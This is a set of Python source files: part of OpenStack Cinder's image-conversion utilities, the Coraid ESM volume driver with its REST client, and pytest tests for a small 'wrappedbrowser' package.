    :param out_format: qemu-img output format name (e.g. 'raw', 'vpc')
    :param bps_limit: optional bytes-per-second limit enforced via a
                      blkio cgroup wrapper command
    """
    # '-t none' disables caching, which is required for the blkio cgroup
    # rate limit to take effect.  Place it BEFORE the positional
    # source/dest arguments: qemu-img expects options first, and the
    # original trailing placement only worked thanks to GNU getopt's
    # argument permutation.
    cmd = ('qemu-img', 'convert', '-O', out_format, '-t', 'none',
           source, dest)
    cgcmd = volume_utils.setup_blkio_cgroup(source, dest, bps_limit)
    if cgcmd:
        cmd = tuple(cgcmd) + cmd
    utils.execute(*cmd, run_as_root=True)
def resize_image(source, size, run_as_root=False):
    """Change the virtual size of *source* to *size* gigabytes."""
    utils.execute('qemu-img', 'resize', source, '%sG' % size,
                  run_as_root=run_as_root)
def fetch(context, image_service, image_id, path, _user_id, _project_id):
    """Download *image_id* from the image service into the file at *path*.

    The partially-written file is removed if the download fails.
    """
    # TODO(vish): Improve context handling and add owner and auth data
    #             when it is added to glance.  Right now there is no
    #             auth checking in glance, so we assume that access was
    #             checked before we got here.
    with fileutils.remove_path_on_error(path):
        with open(path, "wb") as image_file:
            image_service.download(context, image_id, image_file)
def fetch_verify_image(context, image_service, image_id, dest,
                       user_id=None, project_id=None, size=None):
    """Fetch an image to *dest* and validate it with qemu-img.

    Rejects images whose format cannot be determined, that have a backing
    file (a potential attack vector), or whose virtual size exceeds *size*
    (in GB) when given.

    :raises: exception.ImageUnacceptable on any validation failure
    """
    fetch(context, image_service, image_id, dest,
          None, None)
    with fileutils.remove_path_on_error(dest):
        data = qemu_img_info(dest)
        fmt = data.file_format
        if fmt is None:
            raise exception.ImageUnacceptable(
                reason=_("'qemu-img info' parsing failed."),
                image_id=image_id)

        backing_file = data.backing_file
        if backing_file is not None:
            raise exception.ImageUnacceptable(
                image_id=image_id,
                reason=(_("fmt=%(fmt)s backed by: %(backing_file)s") %
                        {'fmt': fmt, 'backing_file': backing_file}))

        # NOTE(xqueralt): If the image virtual size doesn't fit in the
        # requested volume there is no point on resizing it because it will
        # generate an unusable image.
        if size is not None and data.virtual_size > size:
            params = {'image_size': data.virtual_size, 'volume_size': size}
            reason = _("Size is %(image_size)dGB and doesn't fit in a "
                       "volume of size %(volume_size)dGB.") % params
            raise exception.ImageUnacceptable(image_id=image_id, reason=reason)
def fetch_to_vhd(context, image_service,
                 image_id, dest, blocksize,
                 user_id=None, project_id=None):
    """Fetch an image and convert it to VHD ('vpc') format at *dest*."""
    fetch_to_volume_format(context, image_service, image_id, dest,
                           'vpc', blocksize,
                           user_id=user_id, project_id=project_id)
def fetch_to_raw(context, image_service,
                 image_id, dest, blocksize,
                 user_id=None, project_id=None, size=None):
    """Fetch an image and convert it to raw format at *dest*."""
    fetch_to_volume_format(context, image_service, image_id, dest,
                           'raw', blocksize,
                           user_id=user_id, project_id=project_id,
                           size=size)
def fetch_to_volume_format(context, image_service,
                           image_id, dest, volume_format, blocksize,
                           user_id=None, project_id=None, size=None):
    """Fetch *image_id* and place it at *dest* in *volume_format*.

    Downloads into a temp file, validates it with qemu-img, then either
    block-copies it (raw image, no qemu-img available) or converts it
    with 'qemu-img convert'. Raises ImageUnacceptable on any validation
    failure. *size* (GB) caps the acceptable virtual size.
    """
    if (CONF.image_conversion_dir and not
            os.path.exists(CONF.image_conversion_dir)):
        os.makedirs(CONF.image_conversion_dir)
    # Assume qemu-img is available until the probe below proves otherwise.
    qemu_img = True
    image_meta = image_service.show(context, image_id)
    # NOTE(avishay): I'm not crazy about creating temp files which may be
    # large and cause disk full errors which would confuse users.
    # Unfortunately it seems that you can't pipe to 'qemu-img convert' because
    # it seeks. Maybe we can think of something for a future version.
    with temporary_file() as tmp:
        # We may be on a system that doesn't have qemu-img installed. That
        # is ok if we are working with a RAW image. This logic checks to see
        # if qemu-img is installed. If not we make sure the image is RAW and
        # throw an exception if not. Otherwise we stop before needing
        # qemu-img. Systems with qemu-img will always progress through the
        # whole function.
        try:
            # Use the empty tmp file to make sure qemu_img_info works.
            qemu_img_info(tmp)
        except processutils.ProcessExecutionError:
            qemu_img = False
            if image_meta:
                if image_meta['disk_format'] != 'raw':
                    raise exception.ImageUnacceptable(
                        reason=_("qemu-img is not installed and image is of "
                                 "type %s. Only RAW images can be used if "
                                 "qemu-img is not installed.") %
                        image_meta['disk_format'],
                        image_id=image_id)
            else:
                raise exception.ImageUnacceptable(
                    reason=_("qemu-img is not installed and the disk "
                             "format is not specified. Only RAW images "
                             "can be used if qemu-img is not installed."),
                    image_id=image_id)
        fetch(context, image_service, image_id, tmp, user_id, project_id)
        # XenServer images are tarballs of VHD chains; flatten them first.
        if is_xenserver_image(context, image_service, image_id):
            replace_xenserver_image_with_coalesced_vhd(tmp)
        if not qemu_img:
            # qemu-img is not installed but we do have a RAW image. As a
            # result we only need to copy the image to the destination and then
            # return.
            LOG.debug('Copying image from %(tmp)s to volume %(dest)s - '
                      'size: %(size)s' % {'tmp': tmp, 'dest': dest,
                                          'size': image_meta['size']})
            volume_utils.copy_volume(tmp, dest, image_meta['size'], blocksize)
            return
        data = qemu_img_info(tmp)
        # qemu-img reports virtual_size in bytes; convert to GB.
        virt_size = data.virtual_size / units.Gi
        # NOTE(xqueralt): If the image virtual size doesn't fit in the
        # requested volume there is no point on resizing it because it will
        # generate an unusable image.
        if size is not None and virt_size > size:
            params = {'image_size': virt_size, 'volume_size': size}
            reason = _("Size is %(image_size)dGB and doesn't fit in a "
                       "volume of size %(volume_size)dGB.") % params
            raise exception.ImageUnacceptable(image_id=image_id, reason=reason)
        fmt = data.file_format
        if fmt is None:
            raise exception.ImageUnacceptable(
                reason=_("'qemu-img info' parsing failed."),
                image_id=image_id)
        backing_file = data.backing_file
        if backing_file is not None:
            raise exception.ImageUnacceptable(
                image_id=image_id,
                reason=_("fmt=%(fmt)s backed by:%(backing_file)s")
                % {'fmt': fmt, 'backing_file': backing_file, })
        # NOTE(jdg): I'm using qemu-img convert to write
        # to the volume regardless if it *needs* conversion or not
        # TODO(avishay): We can speed this up by checking if the image is raw
        # and if so, writing directly to the device. However, we need to keep
        # check via 'qemu-img info' that what we copied was in fact a raw
        # image and not a different format with a backing file, which may be
        # malicious.
        LOG.debug("%s was %s, converting to %s " % (image_id, fmt,
                                                    volume_format))
        convert_image(tmp, dest, volume_format,
                      bps_limit=CONF.volume_copy_bps_limit)
        # Verify the conversion actually produced the requested format.
        data = qemu_img_info(dest)
        if data.file_format != volume_format:
            raise exception.ImageUnacceptable(
                image_id=image_id,
                reason=_("Converted to %(vol_format)s, but format is "
                         "now %(file_format)s") % {'vol_format': volume_format,
                                                   'file_format': data.
                                                   file_format})
def upload_volume(context, image_service, image_meta, volume_path,
                  volume_format='raw'):
    """Upload the volume at *volume_path* to the image service.

    If the target image's disk_format already matches *volume_format*,
    the volume is streamed as-is; otherwise it is converted to the
    image's disk_format via a temp file first.
    """
    image_id = image_meta['id']
    if (image_meta['disk_format'] == volume_format):
        LOG.debug("%s was %s, no need to convert to %s" %
                  (image_id, volume_format, image_meta['disk_format']))
        if os.name == 'nt' or os.access(volume_path, os.R_OK):
            with fileutils.file_open(volume_path) as image_file:
                image_service.update(context, image_id, {}, image_file)
        else:
            # Volume file is not readable by the current user; chown it
            # temporarily for the duration of the upload.
            with utils.temporary_chown(volume_path):
                with fileutils.file_open(volume_path) as image_file:
                    image_service.update(context, image_id, {}, image_file)
        return
    if (CONF.image_conversion_dir and not
            os.path.exists(CONF.image_conversion_dir)):
        os.makedirs(CONF.image_conversion_dir)
    fd, tmp = tempfile.mkstemp(dir=CONF.image_conversion_dir)
    os.close(fd)
    with fileutils.remove_path_on_error(tmp):
        LOG.debug("%s was %s, converting to %s" %
                  (image_id, volume_format, image_meta['disk_format']))
        convert_image(volume_path, tmp, image_meta['disk_format'],
                      bps_limit=CONF.volume_copy_bps_limit)
        # Verify the conversion produced the format the image expects.
        data = qemu_img_info(tmp)
        if data.file_format != image_meta['disk_format']:
            raise exception.ImageUnacceptable(
                image_id=image_id,
                reason=_("Converted to %(f1)s, but format is now %(f2)s") %
                {'f1': image_meta['disk_format'], 'f2': data.file_format})
        with fileutils.file_open(tmp) as image_file:
            image_service.update(context, image_id, {}, image_file)
        fileutils.delete_if_exists(tmp)
def is_xenserver_image(context, image_service, image_id):
    """Return True when the image's metadata marks it as a XenServer image."""
    image_meta = image_service.show(context, image_id)
    return is_xenserver_format(image_meta)
def is_xenserver_format(image_meta):
    """Return True for XenServer images: VHD disk in an OVF container."""
    disk_format = image_meta['disk_format']
    container_format = image_meta['container_format']
    return disk_format == 'vhd' and container_format == 'ovf'
def file_exist(fpath):
    """Return True when *fpath* exists on the local filesystem."""
    exists = os.path.exists(fpath)
    return exists
def set_vhd_parent(vhd_path, parentpath):
    """Point *vhd_path*'s parent link at *parentpath* via vhd-util."""
    utils.execute('vhd-util', 'modify', '-n', vhd_path, '-p', parentpath)
def extract_targz(archive_name, target):
    """Extract a .tar.gz archive into the *target* directory."""
    utils.execute('tar', '-xzf', archive_name, '-C', target)
def fix_vhd_chain(vhd_chain):
    """Re-link each VHD in the chain so its parent is the next element."""
    for position in range(len(vhd_chain) - 1):
        set_vhd_parent(vhd_chain[position], vhd_chain[position + 1])
def get_vhd_size(vhd_path):
    """Return the virtual size of *vhd_path* as reported by vhd-util."""
    out, err = utils.execute('vhd-util', 'query', '-n', vhd_path, '-v')
    return int(out)
def resize_vhd(vhd_path, size, journal):
    """Resize *vhd_path* to *size*, journaling the operation to *journal*."""
    utils.execute(
        'vhd-util', 'resize', '-n', vhd_path, '-s', '%d' % size, '-j', journal)
def coalesce_vhd(vhd_path):
    """Merge *vhd_path*'s data into its parent VHD via vhd-util."""
    utils.execute(
        'vhd-util', 'coalesce', '-n', vhd_path)
def create_temporary_file(*args, **kwargs):
    """Create a closed temp file in CONF.image_conversion_dir, return its path."""
    handle, path = tempfile.mkstemp(dir=CONF.image_conversion_dir,
                                    *args, **kwargs)
    # The caller only needs the path; close the OS-level handle right away.
    os.close(handle)
    return path
def rename_file(src, dst):
    """Move *src* to *dst* using os.rename (atomic on the same filesystem)."""
    return os.rename(src, dst)
@contextlib.contextmanager
def temporary_file(*args, **kwargs):
    """Context manager yielding a temp file path, deleted on exit.

    Extra args/kwargs are forwarded to tempfile.mkstemp.
    """
    # BUG FIX: creation must happen *before* the try block. Previously, if
    # create_temporary_file() raised, the finally clause referenced the
    # unbound name `tmp` and the real error was masked by an
    # UnboundLocalError.
    tmp = create_temporary_file(*args, **kwargs)
    try:
        yield tmp
    finally:
        fileutils.delete_if_exists(tmp)
def temporary_dir():
    """Return a temp-directory context manager rooted at the conversion dir."""
    return utils.tempdir(dir=CONF.image_conversion_dir)
def coalesce_chain(vhd_chain):
    """Collapse a VHD chain into its final element and return that path.

    For each (child, parent) pair the parent is first resized (with a
    journal file) to hold the child's data, then the child is coalesced
    into it.
    """
    for child, parent in zip(vhd_chain[:-1], vhd_chain[1:]):
        with temporary_dir() as directory_for_journal:
            size = get_vhd_size(child)
            journal_file = os.path.join(
                directory_for_journal, 'vhd-util-resize-journal')
            resize_vhd(parent, size, journal_file)
            coalesce_vhd(child)
    return vhd_chain[-1]
def discover_vhd_chain(directory):
    """Collect consecutively numbered VHD paths (0.vhd, 1.vhd, ...).

    Stops at the first missing index and returns the paths in order.
    """
    chain = []
    index = 0
    candidate = os.path.join(directory, '0.vhd')
    while file_exist(candidate):
        chain.append(candidate)
        index += 1
        candidate = os.path.join(directory, '%d.vhd' % index)
    return chain
def replace_xenserver_image_with_coalesced_vhd(image_file):
    """Flatten a XenServer tgz image in place into one coalesced VHD.

    Extracts the archive, re-links the numbered VHD chain, coalesces it,
    then replaces *image_file* with the resulting single VHD.
    """
    with temporary_dir() as tempdir:
        extract_targz(image_file, tempdir)
        chain = discover_vhd_chain(tempdir)
        fix_vhd_chain(chain)
        coalesced = coalesce_chain(chain)
        fileutils.delete_if_exists(image_file)
        rename_file(coalesced, image_file)
|
adelina-t/cinder | cinder/volume/drivers/coraid.py | # Copyright 2012 Alyseo.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Desc : Driver to store volumes on Coraid Appliances.
Require : Coraid EtherCloud ESM, Coraid VSX and Coraid SRX.
Author : <NAME> <<EMAIL>>
Author : <NAME> <<EMAIL>>
Author : <NAME> <<EMAIL>>
Contrib : <NAME> <<EMAIL>>
"""
import cookielib
import math
import urllib
import urllib2
from oslo.config import cfg
import six.moves.urllib.parse as urlparse
from cinder import exception
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import jsonutils
from cinder.openstack.common import lockutils
from cinder.openstack.common import log as logging
from cinder.openstack.common import units
from cinder.volume import driver
from cinder.volume import volume_types
LOG = logging.getLogger(__name__)
# Driver configuration options; registered on the global CONF below.
coraid_opts = [
    cfg.StrOpt('coraid_esm_address',
               default='',
               help='IP address of Coraid ESM'),
    cfg.StrOpt('coraid_user',
               default='admin',
               help='User name to connect to Coraid ESM'),
    cfg.StrOpt('coraid_group',
               default='admin',
               help='Name of group on Coraid ESM to which coraid_user belongs'
               ' (must have admin privilege)'),
    cfg.StrOpt('coraid_password',
               default='password',
               help='Password to connect to Coraid ESM'),
    cfg.StrOpt('coraid_repository_key',
               default='coraid_repository',
               help='Volume Type key name to store ESM Repository Name'),
]
CONF = cfg.CONF
CONF.register_opts(coraid_opts)
# ESM reply states that indicate the login session is no longer valid
# (see CoraidAppliance._is_session_expired).
ESM_SESSION_EXPIRED_STATES = ['GeneralAdminFailure',
                              'passwordInactivityTimeout',
                              'passwordAbsoluteTimeout']
class CoraidRESTClient(object):
    """Executes REST RPC requests on Coraid ESM EtherCloud Appliance."""
    def __init__(self, esm_url):
        # Fail fast on non-https URLs; see _check_esm_url.
        self._check_esm_url(esm_url)
        self._esm_url = esm_url
        # The cookie jar carries the ESM session cookie between requests.
        self._cookie_jar = cookielib.CookieJar()
        self._url_opener = urllib2.build_opener(
            urllib2.HTTPCookieProcessor(self._cookie_jar))
    def _check_esm_url(self, esm_url):
        """Raise ValueError unless *esm_url* uses the https scheme."""
        splitted = urlparse.urlsplit(esm_url)
        if splitted.scheme != 'https':
            raise ValueError(
                _('Invalid ESM url scheme "%s". Supported https only.') %
                splitted.scheme)
    @lockutils.synchronized('coraid_rpc', 'cinder-', False)
    def rpc(self, handle, url_params, data, allow_empty_response=False):
        # Serialized via the lock decorator so only one REST call runs at
        # a time per process.
        return self._rpc(handle, url_params, data, allow_empty_response)
    def _rpc(self, handle, url_params, data, allow_empty_response):
        """Execute REST RPC using url <esm_url>/handle?url_params.
        Send JSON encoded data in body of POST request.
        Exceptions:
            urllib2.URLError
                1. Name or service not found (e.reason is socket.gaierror)
                2. Socket blocking operation timeout (e.reason is
                   socket.timeout)
                3. Network IO error (e.reason is socket.error)
            urllib2.HTTPError
                1. HTTP 404, HTTP 500 etc.
            CoraidJsonEncodeFailure - bad REST response
        """
        # Handle must be simple path, for example:
        #    /configure
        if '?' in handle or '&' in handle:
            raise ValueError(_('Invalid REST handle name. Expected path.'))
        # Request url includes base ESM url, handle path and optional
        # URL params.
        rest_url = urlparse.urljoin(self._esm_url, handle)
        encoded_url_params = urllib.urlencode(url_params)
        if encoded_url_params:
            rest_url += '?' + encoded_url_params
        if data is None:
            json_request = None
        else:
            json_request = jsonutils.dumps(data)
        request = urllib2.Request(rest_url, json_request)
        response = self._url_opener.open(request).read()
        try:
            if not response and allow_empty_response:
                reply = {}
            else:
                reply = jsonutils.loads(response)
        except (TypeError, ValueError) as exc:
            msg = (_('Call to json.loads() failed: %(ex)s.'
                     ' Response: %(resp)s') %
                   {'ex': exc, 'resp': response})
            raise exception.CoraidJsonEncodeFailure(msg)
        return reply
def to_coraid_kb(gb):
    """Convert gigabytes to the 1000-byte 'K' unit the ESM expects."""
    size_in_bytes = float(gb) * units.Gi
    return math.ceil(size_in_bytes / 1000)
def coraid_volume_size(gb):
    """Format a size in gigabytes as the ESM '<n>K' volume-size string."""
    return '%sK' % to_coraid_kb(gb)
class CoraidAppliance(object):
    """Session-aware facade over CoraidRESTClient.

    Handles login, effective-group selection and transparent re-login
    when the ESM reports an expired session. Volume operations are
    expressed as 'configure' requests against the ESM orchestration API.
    """
    def __init__(self, rest_client, username, password, group):
        self._rest_client = rest_client
        self._username = username
        self._password = password
        self._group = group
        # True once login + group selection have succeeded.
        self._logined = False
    def _login(self):
        """Login into ESM.
        Perform login request and return available groups.
        :returns: dict -- map with group_name to group_id
        """
        ADMIN_GROUP_PREFIX = 'admin group:'
        url_params = {'op': 'login',
                      'username': self._username,
                      'password': self._password}
        reply = self._rest_client.rpc('admin', url_params, 'Login')
        if reply['state'] != 'adminSucceed':
            raise exception.CoraidESMBadCredentials()
        # Read groups map from login reply.
        groups_map = {}
        for group_info in reply.get('values', []):
            full_group_name = group_info['fullPath']
            if full_group_name.startswith(ADMIN_GROUP_PREFIX):
                group_name = full_group_name[len(ADMIN_GROUP_PREFIX):]
                groups_map[group_name] = group_info['groupId']
        return groups_map
    def _set_effective_group(self, groups_map, group):
        """Set effective group.
        Use groups_map returned from _login method.
        """
        try:
            group_id = groups_map[group]
        except KeyError:
            raise exception.CoraidESMBadGroup(group_name=group)
        url_params = {'op': 'setRbacGroup',
                      'groupId': group_id}
        reply = self._rest_client.rpc('admin', url_params, 'Group')
        if reply['state'] != 'adminSucceed':
            raise exception.CoraidESMBadCredentials()
        self._logined = True
    def _ensure_session(self):
        """Login and select the group on first use (lazy session setup)."""
        if not self._logined:
            groups_map = self._login()
            self._set_effective_group(groups_map, self._group)
    def _relogin(self):
        """Force a fresh login on the next _ensure_session call."""
        self._logined = False
        self._ensure_session()
    def rpc(self, handle, url_params, data, allow_empty_response=False):
        """Execute an RPC, re-logging in (up to 3 times) on session expiry."""
        self._ensure_session()
        relogin_attempts = 3
        # Do action, relogin if needed and repeat action.
        while True:
            reply = self._rest_client.rpc(handle, url_params, data,
                                          allow_empty_response)
            if self._is_session_expired(reply):
                relogin_attempts -= 1
                if relogin_attempts <= 0:
                    raise exception.CoraidESMReloginFailed()
                LOG.debug('Session is expired. Relogin on ESM.')
                self._relogin()
            else:
                return reply
    def _is_session_expired(self, reply):
        """True when the reply signals an expired/invalidated session."""
        return ('state' in reply and
                reply['state'] in ESM_SESSION_EXPIRED_STATES and
                reply['metaCROp'] == 'reboot')
    def _is_bad_config_state(self, reply):
        """True when a configure reply is missing or reports failure."""
        return (not reply or
                'configState' not in reply or
                reply['configState'] != 'completedSuccessfully')
    def configure(self, json_request):
        """Send a 'configure' request; raise CoraidESMConfigureError on failure."""
        reply = self.rpc('configure', {}, json_request)
        if self._is_bad_config_state(reply):
            # Calculate error message
            if not reply:
                reason = _('Reply is empty.')
            else:
                reason = reply.get('message', _('Error message is empty.'))
            raise exception.CoraidESMConfigureError(reason=reason)
        return reply
    def esm_command(self, request):
        """JSON-encode the request payload and submit it via configure()."""
        request['data'] = jsonutils.dumps(request['data'])
        return self.configure([request])
    def get_volume_info(self, volume_name):
        """Retrieve volume information for a given volume name."""
        url_params = {'shelf': 'cms',
                      'orchStrRepo': '',
                      'lv': volume_name}
        reply = self.rpc('fetch', url_params, None)
        try:
            volume_info = reply[0][1]['reply'][0]
        except (IndexError, KeyError):
            # Any shape mismatch in the reply means the volume is unknown.
            raise exception.VolumeNotFound(volume_id=volume_name)
        return {'pool': volume_info['lv']['containingPool'],
                'repo': volume_info['repoName'],
                'lun': volume_info['lv']['lvStatus']['exportedLun']['lun'],
                'shelf': volume_info['lv']['lvStatus']['exportedLun']['shelf']}
    def get_volume_repository(self, volume_name):
        """Return the name of the ESM repository containing *volume_name*."""
        volume_info = self.get_volume_info(volume_name)
        return volume_info['repo']
    def get_all_repos(self):
        """Return the list of repository descriptions known to the ESM."""
        reply = self.rpc('fetch', {'orchStrRepo': ''}, None)
        try:
            return reply[0][1]['reply']
        except (IndexError, KeyError):
            return []
    def ping(self):
        """Cheap reachability check; raises CoraidESMNotAvailable on failure."""
        try:
            self.rpc('fetch', {}, None, allow_empty_response=True)
        except Exception as e:
            LOG.debug('Coraid Appliance ping failed: %s', e)
            raise exception.CoraidESMNotAvailable(reason=e)
    def create_lun(self, repository_name, volume_name, volume_size_in_gb):
        """Create a LUN of the given size in *repository_name*."""
        request = {'addr': 'cms',
                   'data': {
                       'servers': [],
                       'repoName': repository_name,
                       'lvName': volume_name,
                       'size': coraid_volume_size(volume_size_in_gb)},
                   'op': 'orchStrLun',
                   'args': 'add'}
        esm_result = self.esm_command(request)
        LOG.debug('Volume "%(name)s" created with VSX LUN "%(lun)s"' %
                  {'name': volume_name,
                   'lun': esm_result['firstParam']})
        return esm_result
    def delete_lun(self, volume_name):
        """Delete the LUN backing *volume_name*."""
        repository_name = self.get_volume_repository(volume_name)
        request = {'addr': 'cms',
                   'data': {
                       'repoName': repository_name,
                       'lvName': volume_name},
                   'op': 'orchStrLun/verified',
                   'args': 'delete'}
        esm_result = self.esm_command(request)
        LOG.debug('Volume "%s" deleted.', volume_name)
        return esm_result
    def resize_volume(self, volume_name, new_volume_size_in_gb):
        """Resize *volume_name* to *new_volume_size_in_gb* gigabytes."""
        LOG.debug('Resize volume "%(name)s" to %(size)s GB.' %
                  {'name': volume_name,
                   'size': new_volume_size_in_gb})
        repository = self.get_volume_repository(volume_name)
        LOG.debug('Repository for volume "%(name)s" found: "%(repo)s"' %
                  {'name': volume_name,
                   'repo': repository})
        request = {'addr': 'cms',
                   'data': {
                       'lvName': volume_name,
                       'newLvName': volume_name + '-resize',
                       'size': coraid_volume_size(new_volume_size_in_gb),
                       'repoName': repository},
                   'op': 'orchStrLunMods',
                   'args': 'resize'}
        esm_result = self.esm_command(request)
        LOG.debug('Volume "%(name)s" resized. New size is %(size)s GB.' %
                  {'name': volume_name,
                   'size': new_volume_size_in_gb})
        return esm_result
    def create_snapshot(self, volume_name, snapshot_name):
        """Create a snapshot of *volume_name* named *snapshot_name*."""
        volume_repository = self.get_volume_repository(volume_name)
        request = {'addr': 'cms',
                   'data': {
                       'repoName': volume_repository,
                       'lvName': volume_name,
                       'newLvName': snapshot_name},
                   'op': 'orchStrLunMods',
                   'args': 'addClSnap'}
        esm_result = self.esm_command(request)
        return esm_result
    def delete_snapshot(self, snapshot_name):
        """Delete the snapshot named *snapshot_name*."""
        repository_name = self.get_volume_repository(snapshot_name)
        request = {'addr': 'cms',
                   'data': {
                       'repoName': repository_name,
                       'lvName': snapshot_name},
                   'op': 'orchStrLunMods',
                   'args': 'delClSnap'}
        esm_result = self.esm_command(request)
        return esm_result
    def create_volume_from_snapshot(self,
                                    snapshot_name,
                                    volume_name,
                                    dest_repository_name):
        """Clone *snapshot_name* into a new volume in *dest_repository_name*."""
        snapshot_repo = self.get_volume_repository(snapshot_name)
        request = {'addr': 'cms',
                   'data': {
                       'lvName': snapshot_name,
                       'repoName': snapshot_repo,
                       'newLvName': volume_name,
                       'newRepoName': dest_repository_name},
                   'op': 'orchStrLunMods',
                   'args': 'addClone'}
        esm_result = self.esm_command(request)
        return esm_result
    def clone_volume(self,
                     src_volume_name,
                     dst_volume_name,
                     dst_repository_name):
        """Clone a volume; source and destination must share a repository."""
        src_volume_info = self.get_volume_info(src_volume_name)
        if src_volume_info['repo'] != dst_repository_name:
            raise exception.CoraidException(
                _('Cannot create clone volume in different repository.'))
        request = {'addr': 'cms',
                   'data': {
                       'shelfLun': '{0}.{1}'.format(src_volume_info['shelf'],
                                                    src_volume_info['lun']),
                       'lvName': src_volume_name,
                       'repoName': src_volume_info['repo'],
                       'newLvName': dst_volume_name,
                       'newRepoName': dst_repository_name},
                   'op': 'orchStrLunMods',
                   'args': 'addClone'}
        return self.esm_command(request)
class CoraidDriver(driver.VolumeDriver):
    """This is the Class to set in cinder.conf (volume_driver)."""
    VERSION = '1.0.0'
    def __init__(self, *args, **kwargs):
        super(CoraidDriver, self).__init__(*args, **kwargs)
        self.configuration.append_config_values(coraid_opts)
        # Static parts of the stats report; capacity values are unknown
        # because the ESM does not expose them here.
        self._stats = {'driver_version': self.VERSION,
                       'free_capacity_gb': 'unknown',
                       'reserved_percentage': 0,
                       'storage_protocol': 'aoe',
                       'total_capacity_gb': 'unknown',
                       'vendor_name': 'Coraid'}
        backend_name = self.configuration.safe_get('volume_backend_name')
        self._stats['volume_backend_name'] = backend_name or 'EtherCloud ESM'
    @property
    def appliance(self):
        """Return a fresh CoraidAppliance for every access.

        # NOTE(nsobolevsky): This is workaround for bug in the ESM appliance.
        # If there is a lot of request with the same session/cookie/connection,
        # the appliance could corrupt all following request in session.
        # For that purpose we just create a new appliance.
        """
        esm_url = "https://{0}:8443".format(
            self.configuration.coraid_esm_address)
        return CoraidAppliance(CoraidRESTClient(esm_url),
                               self.configuration.coraid_user,
                               self.configuration.coraid_password,
                               self.configuration.coraid_group)
    def check_for_setup_error(self):
        """Return an error if prerequisites aren't met."""
        self.appliance.ping()
    def _get_repository(self, volume_type):
        """Get the ESM Repository from the Volume Type.
        The ESM Repository is stored into a volume_type_extra_specs key.
        """
        volume_type_id = volume_type['id']
        repository_key_name = self.configuration.coraid_repository_key
        repository = volume_types.get_volume_type_extra_specs(
            volume_type_id, repository_key_name)
        # Remove <in> keyword from repository name if needed
        if repository.startswith('<in> '):
            return repository[len('<in> '):]
        else:
            return repository
    def create_volume(self, volume):
        """Create a Volume."""
        repository = self._get_repository(volume['volume_type'])
        self.appliance.create_lun(repository, volume['name'], volume['size'])
    def create_cloned_volume(self, volume, src_vref):
        """Clone *src_vref* into *volume*, resizing if sizes differ."""
        dst_volume_repository = self._get_repository(volume['volume_type'])
        self.appliance.clone_volume(src_vref['name'],
                                    volume['name'],
                                    dst_volume_repository)
        if volume['size'] != src_vref['size']:
            self.appliance.resize_volume(volume['name'], volume['size'])
    def delete_volume(self, volume):
        """Delete a Volume."""
        try:
            self.appliance.delete_lun(volume['name'])
        except exception.VolumeNotFound:
            # Volume already gone on the appliance; just verify the ESM
            # is reachable so real connectivity errors still surface.
            self.appliance.ping()
    def create_snapshot(self, snapshot):
        """Create a Snapshot."""
        volume_name = snapshot['volume_name']
        snapshot_name = snapshot['name']
        self.appliance.create_snapshot(volume_name, snapshot_name)
    def delete_snapshot(self, snapshot):
        """Delete a Snapshot."""
        snapshot_name = snapshot['name']
        self.appliance.delete_snapshot(snapshot_name)
    def create_volume_from_snapshot(self, volume, snapshot):
        """Create a Volume from a Snapshot."""
        snapshot_name = snapshot['name']
        repository = self._get_repository(volume['volume_type'])
        self.appliance.create_volume_from_snapshot(snapshot_name,
                                                   volume['name'],
                                                   repository)
        if volume['size'] > snapshot['volume_size']:
            self.appliance.resize_volume(volume['name'], volume['size'])
    def extend_volume(self, volume, new_size):
        """Extend an existing volume."""
        self.appliance.resize_volume(volume['name'], new_size)
    def initialize_connection(self, volume, connector):
        """Return connection information."""
        volume_info = self.appliance.get_volume_info(volume['name'])
        shelf = volume_info['shelf']
        lun = volume_info['lun']
        LOG.debug('Initialize connection %(shelf)s/%(lun)s for %(name)s' %
                  {'shelf': shelf,
                   'lun': lun,
                   'name': volume['name']})
        aoe_properties = {'target_shelf': shelf,
                          'target_lun': lun}
        return {'driver_volume_type': 'aoe',
                'data': aoe_properties}
    def _get_repository_capabilities(self):
        """Return a space-separated '<profile>:<repo>' list for all repos."""
        repos_list = map(lambda i: i['profile']['fullName'] + ':' + i['name'],
                         self.appliance.get_all_repos())
        return ' '.join(repos_list)
    def update_volume_stats(self):
        """Refresh the repository-capability entry in the stats dict."""
        capabilities = self._get_repository_capabilities()
        self._stats[self.configuration.coraid_repository_key] = capabilities
    def get_volume_stats(self, refresh=False):
        """Return Volume Stats."""
        if refresh:
            self.update_volume_stats()
        return self._stats
    def local_path(self, volume):
        # Not applicable for AoE-attached volumes.
        pass
    def create_export(self, context, volume):
        # LUNs are exported by the appliance at creation time; nothing to do.
        pass
    def remove_export(self, context, volume):
        pass
    def terminate_connection(self, volume, connector, **kwargs):
        pass
    def ensure_export(self, context, volume):
        pass
|
woodpecker324/wrappedbrowser | tests/test_wrappedbrowser.py | <reponame>woodpecker324/wrappedbrowser
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `wrappedbrowser` package."""
import webbrowser
from unittest.mock import MagicMock
import pytest
from wrappedbrowser import wrappedbrowser
from wrappedbrowser.errors import InvalidDestinationError
def test_with_browser_type(mocker):
    """Test with an explicit browser type.

    The given type name must be forwarded to webbrowser.get.
    """
    mocker.patch.object(webbrowser, "get")
    wrappedbrowser.open("https://www.example.com", "chromium-browser")
    webbrowser.get.assert_called_once_with("chromium-browser")
def test_open_one_url(mocker):
    """Test with a single url.

    A string destination must be opened via open_new exactly once.
    """
    mocked_browser = MagicMock()
    mocker.patch.object(webbrowser, "get", return_value=mocked_browser)
    mocker.patch.object(mocked_browser, "open_new")
    wrappedbrowser.open("https://www.example.com")
    webbrowser.get.assert_called_once()
    mocked_browser.open_new.assert_called_once_with("https://www.example.com")
def test_open_two_urls(mocker):
    """Test with a list of urls.

    The first url opens a new window; subsequent urls open new tabs.
    """
    mocked_browser = MagicMock()
    mocker.patch.object(webbrowser, "get", return_value=mocked_browser)
    mocker.patch.object(mocked_browser, "open_new")
    wrappedbrowser.open(["https://www.example.com", "https://www.python.org"])
    webbrowser.get.assert_called_once()
    mocked_browser.open_new.assert_called_once_with("https://www.example.com")
